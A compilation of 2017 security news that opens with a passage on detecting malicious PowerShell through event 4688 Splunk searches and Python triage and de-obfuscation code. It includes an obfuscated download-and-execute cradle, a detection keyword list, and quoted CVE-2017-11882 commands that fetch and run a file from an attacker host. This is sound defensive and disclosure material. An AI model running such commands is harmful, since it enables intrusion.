In addition, it is important to log the command-line parameters passed at process creation. Command-line auditing is available starting from Windows 8.1 and Windows Server 2012 R2. We just need to enable it with Include command line in process creation events under Administrative Templates\System\Audit Process Creation, and roll this out via GPO. You can read more on this here.

Microsoft has released an update (KB3004375) that makes this feature available on its other supported versions, Windows 7, Server 2008 and Server 2008 R2. You can read more on this here and here.

Event ID 4688 gives us three key pieces of information on which SIEM alerts can be built to detect such attacks:

- which process has been created
- which command-line parameters/arguments were passed at process creation (if any)
- which process is the parent (Windows 10 / Windows Server 2016 and later include the name of the parent process in the Creator_Process_Name field; earlier versions of Windows include only the process ID of the parent under Creator_Process_ID)

I will take Splunk as an example and explain how alerts can be created to detect suspicious PowerShell activity in your environment. I will also mention the caveats associated with the alerts.

First of all, we are interested in capturing PowerShell attacks, so we need to monitor the events where powershell.exe is created. A typical 4688 event looks like the following; it includes the field New_Process_Name, which tells us which process was created.

So, we need to pick up those events with the following search:

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

Note that the 32-bit host, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, also appears in the in-the-wild examples above, so match on both paths (or on the file name alone).
The next step is to review the command-line arguments passed when the PowerShell process was started.

Process_Command_Line gives the command-line parameters passed to the newly created process, i.e. PowerShell. We can create an alert based on the frequently used parameters like -e, -Enc, -WindowStyle, Bypass, -c, -Command, etc.

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (Process_Command_Line="* -c *" OR Process_Command_Line="* -e *" OR Process_Command_Line="* -enc*" OR Process_Command_Line="*-windowstyle*" OR Process_Command_Line="*bypass*")

A better option is to create an input lookup list of known suspicious command-line arguments and look up against it in your alert.

Starting with Windows 10 and Windows Server 2016, Microsoft added a field called “Creator Process Name” to event ID 4688 which gives the name of the parent process. This field helps to create alerts based on suspicious parents:

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\Program Files\\Microsoft Office\\Office15\\winword.exe"
index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\Windows\\System32\\mshta.exe"
index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\Windows\\System32\\cmd.exe"

On earlier Windows versions only Creator_Process_ID is available, so the parent (and, on every version, the grandparent) has to be resolved by joining against the 4688 event that created that process ID.
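The following Python, added here and not part of the original post, applies the parent/grandparent rules from the process-tree section above to 4688-style records such as the Splunk searches return. Because 4688 names only the immediate parent (and only on Windows 10 / Server 2016 or later), the grandparent is recovered by joining each event to the record that created its Creator_Process_ID, taking the most recent such record before the child's own creation so that a reused PID does not point at the wrong process. The field layout, the sample events and the extension of the winword.exe rule to excel.exe and powerpnt.exe are assumptions of this example.

```python
from collections import defaultdict, namedtuple

# One 4688 record, with fields named after what Splunk extracts from the event.
# `time` is the event's position in the log (a timestamp in practice); it matters
# because Windows reuses process IDs.
Event = namedtuple("Event", "time new_pid new_name creator_pid creator_name cmdline")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
WINWORD = r"C:\Program Files\Microsoft Office\Office15\winword.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
NOTEPAD = r"C:\Windows\System32\notepad.exe"

# Constructed sample events. creator_name is empty where the record imitates a
# pre-Windows 10 host that logs only Creator_Process_ID.
SAMPLE_EVENTS = [
    Event(1, 0x1A0, EXPLORER, 0x100, "", ""),
    Event(2, 0x2B0, PS, 0x1A0, EXPLORER, "powershell.exe"),
    Event(3, 0x3C0, WINWORD, 0x1A0, EXPLORER, "WINWORD.EXE invoice.doc"),
    Event(4, 0x4D0, CMD, 0x3C0, WINWORD, "cmd /c powershell -nop -w hidden -c ..."),
    Event(5, 0x5E0, PS, 0x4D0, CMD, "powershell -nop -w hidden -c ..."),
    Event(6, 0x6F0, WSCRIPT, 0x1A0, EXPLORER, "wscript.exe run.js"),
    Event(7, 0x700, PS, 0x6F0, "", r"powershell.exe Invoke-Item c:\windows\system32\calc.exe"),
    Event(8, 0x810, CMD, 0x1A0, EXPLORER, "cmd.exe"),
    Event(9, 0x920, PS, 0x810, CMD, "powershell -File maintenance.ps1"),
    Event(10, 0x3C0, NOTEPAD, 0x1A0, EXPLORER, "notepad.exe"),  # PID 0x3C0 reused after winword exited
    Event(11, 0xB00, PS, 0x3C0, "", "powershell"),               # parent is notepad, not winword
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}  # post names winword; siblings added (assumption)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "wuapp.exe"}
LAUNCHERS = {"cmd.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def index_by_pid(events):
    """pid -> creation events for that pid, oldest first."""
    by_pid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.time):
        by_pid[ev.new_pid].append(ev)
    return by_pid


def creator_event(by_pid, pid, before):
    """Most recent 4688 record that created `pid` before time `before`: the
    PID-reuse-safe way to find a parent's own record."""
    earlier = [ev for ev in by_pid.get(pid, []) if ev.time < before]
    return earlier[-1] if earlier else None


def ancestry(event, by_pid, depth=2):
    """Basenames of [parent, grandparent, ...]. The name comes from Creator_Process_Name
    when the record has it, otherwise from the creator PID's own 4688 record."""
    names, current = [], event
    for _ in range(depth):
        parent = creator_event(by_pid, current.creator_pid, current.time)
        name = current.creator_name or (parent.new_name if parent else "")
        if not name:
            break
        names.append(basename(name))
        if parent is None:
            break  # parent predates the log; cannot climb further
        current = parent
    return names


def classify(event, by_pid):
    """Apply the post's parent/grandparent rules to one powershell.exe creation."""
    chain = ancestry(event, by_pid)
    parent = chain[0] if chain else None
    grandparent = chain[1] if len(chain) > 1 else None
    if parent in OFFICE:
        return "office-spawned-powershell"
    if parent in SCRIPT_HOSTS:
        return "script-host-spawned-powershell"
    if parent in LAUNCHERS and grandparent in OFFICE | SCRIPT_HOSTS:
        return "office-or-script-via-cmd"
    return "benign-ancestry"


def triage(events):
    """(pid, verdict) for every powershell.exe creation in the log."""
    by_pid = index_by_pid(events)
    return [(ev.new_pid, classify(ev, by_pid))
            for ev in events if basename(ev.new_name) == "powershell.exe"]


if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_EVENTS):
        print(f"{pid:#06x} {verdict}")
```

The admin's cmd.exe-launched PowerShell (event 9) and the user's console (event 2) come out benign, while the macro chain (winword → cmd → powershell) and the script-host case are flagged; event 11 shows why the join must respect event order, since a naive PID lookup would attribute it to winword.exe.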
“Unfortunately, PowerShell commands and scripts are easy to obfuscate.”

There are many ways in which PowerShell scripts can be obfuscated. Random variables or string concatenation can be introduced into the PowerShell command line to fool a static comparison of command lines against the input lookup (as shown above). The following are a few obfuscation methods that can render our static comparison ineffective.

There is an excellent research paper on PowerShell attack methods by Symantec, THE INCREASED USE OF POWERSHELL IN ATTACKS, which includes excellent examples of obfuscation taken from a DerbyCon 2016 talk by Daniel Bohannon on PowerShell obfuscation. The following are a few of the many examples of obfuscation discussed in that paper:

Mixed upper and lower case letters can be used, as commands are not case sensitive.
Example: (neW-oBjEct system.NeT.WeBclieNT). dOWNloadfiLe

Strings can be concatenated, including from variables, allowing for single or double quotes.
Example: (New-Object Net.WebClient). DownloadString(“ht”+’tp://’+$url)

With the exception of the 14 special cases, the escape character ` can be used in front of a character with no change in the result. A similar trick can be used with the escape character ^ when starting PowerShell from cmd.exe.
Example: (new-object net. webclient).”d`o`wnl`oa`dstr`in`g”($url)

Some arguments can be replaced with their numerical representation.
Example: “-window 1” instead of “-window hidden”
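As an added example (not from the post or the Symantec paper), the following Python normalizes a command line before comparing it against a lookup list, undoing the string-level tricks listed above: it strips cmd.exe caret escapes and the no-op backtick escapes, folds concatenated literals, removes whitespace around member access and lower-cases everything. The three obfuscated lines are the paper's examples quoted above; the caret example and the lookup list are constructed for this demonstration. The numeric -window value is a parameter-level trick rather than a string one and is not handled here.

```python
import re

# Backtick escapes that change a PowerShell string's meaning (`n, `t, `0, `$ and so on);
# a backtick in front of any other character is a no-op, which is the obfuscation trick.
MEANINGFUL_ESCAPES = set("0abefnrtuv`\"'$")
QUOTED = r"""("[^"]*"|'[^']*')"""
CONCAT_RE = re.compile(rf"{QUOTED}\s*\+\s*{QUOTED}")

# Lower-case substring lookup list of the kind a SIEM would keep in an input lookup (constructed).
LOOKUP = ["downloadstring", "downloadfile", "net.webclient", "invoke-expression",
          "iex", "-w hidden", "bypass"]

# The post's own obfuscation examples plus one constructed cmd.exe caret example.
OBFUSCATED = [
    "(neW-oBjEct system.NeT.WeBclieNT). dOWNloadfiLe",
    "(New-Object Net.WebClient). DownloadString(\"ht\"+'tp://'+$url)",
    '(new-object net. webclient)."d`o`wnl`oa`dstr`in`g"($url)',
    "powershell -w hid^den -ex^ec byp^ass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u')",
]


def strip_backticks(text):
    """Drop no-op backtick escapes but keep the ones that mean something."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "`" and i + 1 < len(text) and text[i + 1] not in MEANINGFUL_ESCAPES:
            i += 1  # skip the backtick, keep the character after it
            continue
        out.append(text[i])
        i += 1
    return "".join(out)


def fold_concatenation(text):
    """Join adjacent quoted literals: "ht"+'tp://' becomes "http://". Variables stay as they are."""
    previous = None
    while previous != text:
        previous = text
        text = CONCAT_RE.sub(lambda m: '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"', text)
    return text


def normalize(cmdline):
    """Canonical form for matching: carets (cmd.exe escapes) and no-op backticks removed,
    literal concatenations folded, whitespace around member access removed, lower-cased."""
    text = cmdline.replace("^", "")
    text = strip_backticks(text)
    text = fold_concatenation(text)
    text = re.sub(r"\s*\.\s*", ".", text)
    text = re.sub(r"\s+", " ", text).strip()
    return text.lower()


def match_lookup(cmdline, lookup=LOOKUP):
    """(hits on the raw line, hits on the normalized line) for an exact-substring lookup."""
    raw_hits = [key for key in lookup if key in cmdline]
    normalized = normalize(cmdline)
    return raw_hits, [key for key in lookup if key in normalized]


if __name__ == "__main__":
    for line in OBFUSCATED:
        print(match_lookup(line), "<-", line)
```

On every sample the raw comparison returns nothing while the normalized one hits; that gap is the argument for normalizing Process_Command_Line (or, failing that, for alerting on the presence of the obfuscation characters themselves) rather than trusting an exact lookup.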

However, it is important to monitor PowerShell execution in your environment, and if the command lines are obfuscated, the chances are very high that they are part of a cyber attack. Hence, it is imperative to log event ID 4688; you may apply a filter to log only PowerShell process creation, and monitor the command-line arguments passed with each PowerShell process creation.

So till next time – KEEP CALM and STAY VIGILANT !!!

US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the malware FALLCHILL and Volgmer used by the APT group Hidden Cobra that is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used by one of the APT groups linked to the North Korean government, tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and has been involved both in cyber espionage campaigns and in sabotage activities aimed at destroying data and disrupting systems. Security researchers found that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including Operation Troy, the DarkSeoul operation, and the Sony Pictures hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of the North Korea’s ‘Hidden Cobra’ APT group.

Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack codes. UK Government also linked the WannaCry attack that crippled NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. “

The US experts identified 83 network nodes in the FALLCHILL infrastructure, along with the countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), network signatures associated with the threat, and YARA rules for its detection.


The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system” that has been in use since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware has been used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013; the threat was delivered via spear-phishing emails.

DHS also warned that Hidden Cobra has a suite of custom tools that the North Korean hackers use to break into companies.

17-Year-Old MS Office flaw CVE-2017-11882 could be exploited to remotely install malware without victim interaction
15.11.2017 securityaffairs

Oops: a 17-year-old flaw in MS Office, tracked as CVE-2017-11882, could be exploited by remote attackers to install malware with no user interaction beyond opening a document.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability can be triggered on all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability, tracked as CVE-2017-11882, was discovered by security researchers at Embedi. It affects the MS Office component EQNEDT32.EXE (the Equation Editor), which is responsible for inserting and editing equations (OLE objects) in documents.

The component fails to properly handle objects in memory, a bug that can be exploited by an attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000, seventeen years ago, and was kept in Microsoft Office 2007 and later for backward compatibility, which is why those versions are affected too.


To exploit the vulnerability, an attacker needs to trick victims into opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
The attacker can gain full control on the target system by chaining the vulnerability with Windows Kernel privilege escalation exploits like CVE-2017-11847.

Embedi researchers described several attack scenarios:

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).” states the analysis published by Embedi.

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Microsoft has addressed the vulnerability with the November Patch Tuesday release, the tech giant has changed the way the affected component handles objects in memory.

The experts warn that this vulnerable Office component has many security issues and suggest disabling it to avoid problems.

Disabling the component is very simple: run the following command at an elevated command prompt (it writes under HKLM, so administrator rights are required):

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For a 32-bit Microsoft Office package on an x64 OS, the command to run is:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

The flag disables the Equation Editor COM class so that Office no longer loads it; equations created with it in existing documents will not be editable afterwards, and the change can be verified with reg query on the same key.

Microsoft users should also enable Protected View to prevent active content execution (OLE/ActiveX/Macro).

Windows Defender Immune to AVGater Quarantine Flaw: Microsoft
14.11.2017 securityweek

A recently disclosed vulnerability that allows an attacker to abuse the quarantine feature of anti-virus products to escalate privileges doesn’t affect Windows Defender, Microsoft says.

Dubbed AVGater, the new attack method relies on a malicious DLL being quarantined by an anti-virus product and then abuses the security program’s Windows process to restore the file.

Because the anti-virus process typically runs with SYSTEM privileges, the malicious file can be written to a different location (such as the Program Files or Windows folders) than its initial folder, from where it runs with higher privileges.

This is possible because of a type of file link called a junction, which on NTFS file systems lets the restored file be written anywhere on the hard drive. Once written to a folder from which a privileged Windows process is launched, the malicious DLL is loaded ahead of the legitimate one because of how the operating system searches for DLLs.

“To exploit this vulnerability, malicious applications, including those launched by user-level accounts without administrator privileges, create an NTFS junction from the %System% folder to folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder,” Microsoft explains.

Discovered by Florian Bogner, information security auditor at Austria-based Kapsch, the bug was said to affect products from a large number of anti-virus makers. However, only Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Check Point (ZoneAlarm) and Ikarus were named, as they have already patched the issue.

In a blog post, Microsoft underlines the fact that Windows Defender is not affected by the AVGater flaw, which requires that a non-administrator account be able to trigger the restore of a quarantined file.

According to Microsoft, the vulnerability represents a relatively old attack vector, but “Windows Defender Antivirus has never been affected by this vulnerability because it does not permit applications launched by user-level accounts to restore files from quarantine.”

The tech giant explains that this design feature was meant as a built-in protection and that the security application includes similar safety measures against other known user-account permissions vulnerabilities as well.
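As an added illustration (not Microsoft's, Kapsch's or any anti-virus vendor's code), the following Python replays the restore step in a temporary directory: the quarantine record captures the real path of the origin directory when the file is quarantined, the unsafe restore writes back blindly and lands in the privileged directory, and the hardened restore refuses because the directory now resolves somewhere else. A symlink stands in for the NTFS junction, and the directory names and file contents are constructed for the demonstration.

```python
import os
import tempfile


class QuarantineRecord:
    """What a quarantine store keeps about a file: its bytes and where it came from.
    The real path of the origin directory is captured at quarantine time so that a
    later restore can detect redirection."""

    def __init__(self, data, original_path):
        self.data = data
        self.original_path = original_path
        self.original_real_dir = os.path.realpath(os.path.dirname(original_path))


def restore_unsafe(record):
    """Vulnerable pattern: the SYSTEM-privileged service writes back to the recorded path
    as-is, following whatever junction/symlink now sits in that path. Returns where the
    bytes actually landed."""
    with open(record.original_path, "wb") as fh:
        fh.write(record.data)
    return os.path.realpath(record.original_path)


def restore_safe(record):
    """Hardened restore: refuse if the destination directory no longer resolves to where
    it resolved at quarantine time, or if the final component is itself a link."""
    target_dir = os.path.dirname(record.original_path)
    if os.path.realpath(target_dir) != record.original_real_dir:
        raise PermissionError("restore directory now resolves elsewhere; refusing to write")
    if os.path.islink(record.original_path):
        raise PermissionError("restore target is a link; refusing to write")
    with open(record.original_path, "wb") as fh:
        fh.write(record.data)
    return os.path.realpath(record.original_path)


def demo():
    """Replay AVGater in a temporary tree. A symlink stands in for the NTFS junction
    (assumption: the redirection mechanism differs, the realpath check is the same)."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "System32")  # stands in for a privileged directory
        user_dir = os.path.join(root, "Users", "mallory", "Downloads")
        os.makedirs(system_dir)
        os.makedirs(user_dir)
        # Constructed sample: the AV quarantined evil.dll out of the user's directory.
        record = QuarantineRecord(b"MZ-not-really-a-dll", os.path.join(user_dir, "evil.dll"))
        # The low-privileged user replaces the emptied directory with a link into System32.
        os.rmdir(user_dir)
        os.symlink(system_dir, user_dir, target_is_directory=True)
        landed = restore_unsafe(record)
        results["unsafe_landed_in_system"] = os.path.dirname(landed) == os.path.realpath(system_dir)
        os.remove(landed)
        try:
            restore_safe(record)
            results["safe_refused"] = False
        except PermissionError:
            results["safe_refused"] = True
        # Control: an unredirected directory restores normally.
        alice_dir = os.path.join(root, "Users", "alice", "Downloads")
        os.makedirs(alice_dir)
        control = QuarantineRecord(b"harmless", os.path.join(alice_dir, "report.docx"))
        results["safe_restores_when_unredirected"] = os.path.isfile(restore_safe(control))
    return results


if __name__ == "__main__":
    print(demo())
```

The realpath check closes the junction trick but is still a check-then-write sequence, so a robust product performs the restore under the requesting user's own token (impersonation), which bounds the write by that user's privileges; Defender's answer, per Microsoft above, is simply not to let user-level accounts restore from quarantine at all.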

Medigate Emerges From Stealth With Medical Device Firewall
14.11.2017 securityweek Safety

Israel-based startup Medigate emerged from stealth mode on Tuesday with a firewall designed specifically for protecting medical devices, and more than $5 million in seed funding.

Healthcare organizations have been increasingly targeted in the past few years, including in ransomware attacks and operations whose goal was to obtain sensitive medical information. Experts have often also warned about the possibility of attacks aimed at disrupting medical treatment.

While medical devices are increasingly connected, protecting them against cyber threats requires a different approach compared to common IT systems. Applying software patches and installing traditional endpoint security solutions on medical systems can cause disruptions, which is why these devices often remain vulnerable and serve as key pivot points within the targeted organization’s network, as shown by the MEDJACK attacks.

Medigate aims to address this problem with a dedicated platform for securing medical devices that are connected to electronic medical records, device servers, other enterprise systems, and even the Internet.

Using its knowledge of medical workflows, Medigate's firewall provides complete visibility into all devices on the network and allows organizations to quickly identify anomalies and suspicious activity. In addition to detecting threats, the product also blocks malicious communications to prevent damage, Medigate said.

The firewall sits between the medical devices and the servers they communicate with in an effort to prevent attackers from taking control of this part of the network.


“Because it is not possible to effectively deploy endpoint security solutions and regular security patches to these devices, they significantly increase the exposure in my organization’s overall risk posture,” said Heath Renfrow, U.S. Army Medicine CISO. “A product like Medigate would add a much necessary layer of defense, significantly reducing the risk of medical device vulnerabilities to my networks.”

Medigate’s solution is currently available to a limited number of qualified organizations, but it’s expected to become generally available in mid-2018.

Medigate has raised $5.35 million in a seed funding round led by YL Ventures, a seed-stage venture capital firm that invests in Israeli innovations, with participation from early-stage VC company Blumberg Capital.

The Disconnect Between Security Perception and Security Reality
14.11.2017 securityweek Security
A new global survey highlights the disconnect between security expectations and security reality for many IT/security professionals.

There is an awareness of the likelihood of security attacks (45% of respondents expect one within the next 12 months). There is ongoing empirical evidence of the failure of security professionals to stop these attacks, most recently with Equifax. Despite this, 89% of survey respondents believe they are in a good position to protect themselves from attack.

The survey report (PDF), 'Security Practices and Expectations Following the World's Biggest Breach' (Equifax) was published on Monday by Varonis. Five hundred IT and security professionals with personal responsibility for security were questioned between September 28 - October 6, 2017. Two hundred are located in the U.S., with 100 in each of the UK, France and Germany. All work for companies with more than 1,000 employees from within a variety of different vertical industry sectors.

SecurityWeek asked Matt Lock, director of sales engineers at Varonis, why there should be this difference between expectation and reality. One often-quoted possibility is the Optimism Bias (Wikipedia) -- the hard-coded biological instinct that bad things happen to other people, not to me.

Lock doesn't feel that the survey sheds any light on the reasons for the disconnect, merely that it exists. From a personal stand-point he points to over-confidence and possibly a lack of visibility into their own networks. On the former, he commented, "Some really do feel they are completely prepared and have figured out how to keep their organizations safe. In 2017, many well-respected organizations, which would seem to have the resources to ward off cyberattacks, fell victim to breaches and ransomware. Was over-confidence to blame?"

For the latter, he wonders if track-record might be a contributing factor: professionals who don't believe they have been breached might believe "that what they're doing must be working. The reality, however, might be that they have been breached but just don't know it."

Nevertheless, despite the confidence in their ability to resist future attacks, around 25% of the respondents confirmed that their organization had experienced data loss, data theft or ransomware during the last two years. This was highest in Germany, where 34% of respondents reported that their organization had been a victim of ransomware.

The perceived ability to resist attacks is not the only surprising detail to come from the survey. Given the relative imminence of GDPR next year, and the common perception that many companies are still not GDPR-compliant, it would be unsurprising to see 'compliance' as an issue of concern.

This is not shown in practice. In the US, compliance ranks only third in concerns for 2018 (behind data theft and data loss). In the UK it ranks fifth, behind the extra concerns for ransomware and cloud issues, while in neither France nor Germany does it rank anywhere in the top five concerns for next year.

"One possible explanation," Lock told SecurityWeek, "is that the U.S. is reacting more strongly towards GDPR because there hasn't been a regulation quite as stringent in place save for a few highly regulated industries. The attitude in UK, France, and Germany may be that GDPR is just a new spin on the current EU Data Protection Directive (DPD)."

However, he suggests this might change once GDPR starts to be enforced. One possibility is that organizations believe that 2018 will be a bedding-in period for the regulations, and they won't be enforced before 2019. He also suggests that top-of-mind for security professionals could be their most recent fire-fight. "In many ways," he suggested, "security professionals are fighting the last fight; they may be focusing their attention on ransomware and wipers, rather than looking ahead to the GDPR."

A further surprising detail comes in the rate of cyberattack experience. A common perception is that the U.S. experiences more attacks than Europe, for two reasons: first, North American business relies more heavily on IT; second, the stricter breach notification laws in the United States make breach reporting more common than in Europe, which does not report all of the attacks it experiences.

However, this perception is reversed by the survey respondents. Twenty-three percent of U.S. organizations have experienced the loss or theft of company data over the last few years; but this figure rises to 29% in Europe.

"The results are surprising," comments Lock; "and this survey gives us a peek behind the curtain. The figures in the survey suggest there's no correlation, and that organizations are being hit in greater numbers than we previously thought -- possibly they are simply keeping that information to themselves to avoid negative publicity. We may see a notable increase in reported attacks once GDPR kicks in. The results suggest the problem could be much worse than we realize."

Cloudflare Acquires Mobile App Specialist Neumob
14.11.2017 securityweek Mobil

Website performance optimization and security firm Cloudflare has expanded its reach to mobile with the acquisition of Neumob. The agreement brings Cloudflare's global optimization network to mobile apps built with the Neumob SDK. Financial details were not disclosed.

Sunnyvale, Calif.-based Neumob is a firm predicated on improving the performance of mobile computing. Poorly designed apps and the inherent latency of mobile computing mean that one of the most dynamic areas of the internet is also the slowest. Neumob addresses this issue with an SDK aimed at app developers. Its unique selling point is that even slight improvements in internet performance increase user retention and customer conversion.

According to Neumob, its SDK improves load times and in-app performance by 30% to 300%, reduces app errors and timeouts by up to 90%, and significantly reduces bandwidth usage and data fees. "We have a purpose-built solution for the first, middle and last miles traveled in every session," the company explains on its website. "The Neumob SDK is the world's first end-to-end accelerator for app owners and developers. It provides a mobile app with instant access to acceleration and error reduction features at all stages of the mobile delivery process -- the first mile, middle mile and last (mobile) mile."

The weakness is the 'middle mile' -- the internet itself. Neumob has sought to remedy this with the development of its own network of points of presence (POPs) -- 164 in 95 metropolitan areas across 6 continents. It's a start, but hardly a global network.

Cloudflare has that global network: 118 data centers in 58 countries serving more than 7 million domains, already routing around 10% of all HTTP/HTTPS Internet traffic. It also has the technology to move data across the internet with optimum performance. Argo, for example, measures the performance of network paths and routes traffic across the fastest available ones; it keeps secure connections open between Cloudflare's edge locations, eliminating the latency of repeated connection setup.

The combination of Neumob and Cloudflare will benefit both parties. "We've long needed a global network running at the edge to fully realize the technology we've created at Neumob," said Jeff Kim, co-founder of Neumob. "Now that we're a part of the Cloudflare team, we have a tremendous opportunity to engage with Cloudflare's customers and improve the mobile experience for users around the world."

"Cloudflare's mission is to help build a better Internet -- we mean that literally," said Matthew Prince, co-founder and CEO of Cloudflare. "With Neumob, we're now able to reach the last-mile of connectivity and provide the fastest and most secure experience possible for users everywhere, on any device."

Neumob was founded in 2015. It raised $10.9 million in the same year: $2.3 million in seed funding followed by $8.5 million in a Series A round led by Accel Partners.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.

Earlier this year, Cloudflare collaborated with Flashpoint, Akamai and RiskIQ in a cross-vendor project to neutralize the newly emerging WireX botnet.

Freedom of the Net report – Manipulating Social Media, hacking election and much more
14.11.2017 securityweek BigBrothers

Freedom of the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While security experts still debate the cyber attacks surrounding the 2016 U.S. presidential election, the independent watchdog Freedom House reports that online manipulation affected elections in at least 18 countries last year.

The group surveyed 65 countries, home to 87 percent of the world's internet users, and found that in at least 18 of them governments or other actors had tried to influence an election by restricting or interfering with internet use.

According to the organization, governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology. That is the central message of the annual Freedom of the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts were performed by foreign actors, in the majority of the cases they were carried out either by the local government or opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try and influence public sentiments on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

The Chinese government is the most active in this respect, using an army of bloggers and social media users who support its policies and discredit political opponents. China is not alone: in Russia, the Internet Research Agency is a "troll farm" reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, online content manipulation is very difficult to detect, and countering it takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”

Freedom of the Net report

Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”


Fourteen countries passed laws this year restricting internet use, in some cases banning VPNs, and 19 countries resorted to some form of internet shutdown during political events.

The report also warns that physical attacks on netizens and online journalists are spreading globally: in eight countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators were killed for their online activities.

According to the Freedom of the Net report, things will get worse.

IcedID, a new sophisticated banking Trojan doesn’t borrow code from other banking malware
14.11.2017 securityweek

